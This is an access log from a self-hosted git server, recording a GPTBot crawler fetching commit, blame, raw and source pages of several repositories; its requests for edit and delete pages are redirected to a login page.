git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode" -[17/Feb/2026:14:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode" -[17/Feb/2026:14:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 151002] [Gzip 17.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:14:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" -[17/Feb/2026:14:47:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" -[17/Feb/2026:14:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/docker-compose.yml" -[17/Feb/2026:14:47:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" -[17/Feb/2026:14:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/update_status.py" -[17/Feb/2026:14:47:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" -[17/Feb/2026:14:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/update_status.py" -[17/Feb/2026:14:47:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" -[17/Feb/2026:14:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/docker-compose.yml" -[17/Feb/2026:14:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/docker-compose.yml" [Client 74.7.227.38] [Length 10437] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" -[17/Feb/2026:14:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/update_status.py" [Client 74.7.227.38] [Length 808] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" -[17/Feb/2026:14:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/docker-compose.yml" [Client 74.7.227.38] [Length 2549] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" -[17/Feb/2026:14:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" -[17/Feb/2026:14:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/update_status.py" [Client 74.7.227.38] [Length 12740] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" -[17/Feb/2026:14:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/docker-compose.yml" [Client 74.7.227.38] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" -[17/Feb/2026:14:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/update_status.py" [Client 74.7.227.38] [Length 9778] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" -[17/Feb/2026:14:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/docker-compose.yml" [Client 74.7.227.38] [Length 13816] [Gzip 6.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" -[17/Feb/2026:14:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11630] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" -[17/Feb/2026:14:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fservices" [Client 74.7.227.38] [Length 25030] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services" -[17/Feb/2026:14:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11630] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" -[17/Feb/2026:14:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" -[17/Feb/2026:14:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" -[17/Feb/2026:14:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" [Client 74.7.227.38] [Length 9871] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" -[17/Feb/2026:14:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 32570] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" -[17/Feb/2026:14:48:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/update_status.py" -[17/Feb/2026:14:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/update_status.py" -[17/Feb/2026:14:48:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/update_status.py" -[17/Feb/2026:14:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/update_status.py" -[17/Feb/2026:14:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" [Client 74.7.227.38] [Length 11049] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" -[17/Feb/2026:14:48:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/docker-compose.yml" -[17/Feb/2026:14:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/docker-compose.yml" -[17/Feb/2026:14:48:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/docker-compose.yml" -[17/Feb/2026:14:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/docker-compose.yml" -[17/Feb/2026:14:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 202124] [Gzip 15.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10292] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 204061] [Gzip 14.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10524] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10498] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10073] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 203868] [Gzip 14.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 204057] [Gzip 14.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" -[17/Feb/2026:14:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" -[17/Feb/2026:14:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10528] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 149554] [Gzip 16.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fapp%2fmodels.py" [Client 74.7.227.38] [Length 20561] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" -[17/Feb/2026:14:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm" -[17/Feb/2026:14:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10398] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" -[17/Feb/2026:14:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10398] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 